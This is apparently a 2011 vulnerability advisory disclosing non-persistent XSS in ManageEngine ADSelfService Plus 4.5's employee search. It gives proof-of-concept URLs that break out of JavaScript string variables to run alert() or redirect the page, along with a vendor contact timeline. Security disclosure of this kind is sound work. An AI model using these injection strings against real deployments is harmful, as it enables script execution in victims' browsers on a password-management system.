Vulnerability ID: VRPTH-2011-001
Reference: http://jameswebb.me/vulns/vrpth-2011-001.txt
Non-persistent XSS in Zoho ManageEngine ADSelfService Plus
Windows 2008RC2 fully patched.
ManageEngine ADSelfServicePlus version 4.5 Build 4521 installed.
Integrated Into TestDomain
Corporate Directory Search feature in ManageEngine ADSelfServicePlus
version 4.5 Build 4521 is susceptible to
non-persistent XSS attacks. These vulnerabilities are manifest by the
ability for attacker to terminate
javascript variable declarations, escape encapsulation, and append
arbitrary javascript code.
ADSelfService Plus is a password management application for Active
Directory environments.
Double-Quote String Termination
HTTP Request =
https://serverip:port/EmployeeSearch.cc?searchType=contains&searchBy=ALL_FIELDS&searchString=";alert("XSS");//\"
Response Source View
<script language="javascript">
var searchValue = "';alert(XSS)//\"";
Single-Quote String Termination
Similarly…
HTTP Request=
https://serverip:port/EmployeeSearch.cc?searchType=';document.location="http://www.cnn.com";//\"&searchBy=ALL_FIELDS&searchString=Bob
Input is not being escaped/filtered prior to javascript variable assignment
Not aware of patch/fix. Contact Vendor.
09/28/11 - Contacted AdSelfServicePro Team with Vuln. Details
10/07/11 - Requested Update
10/08/11 - Received Response: Advised issues will be handled in future release.
10/27/11 - Requested Update: Inquired if newer posted builds fixed issue
11/03/11 - Received Response: Newer build did not address; Indicated
still researching…
11/17/11 - Released Advisory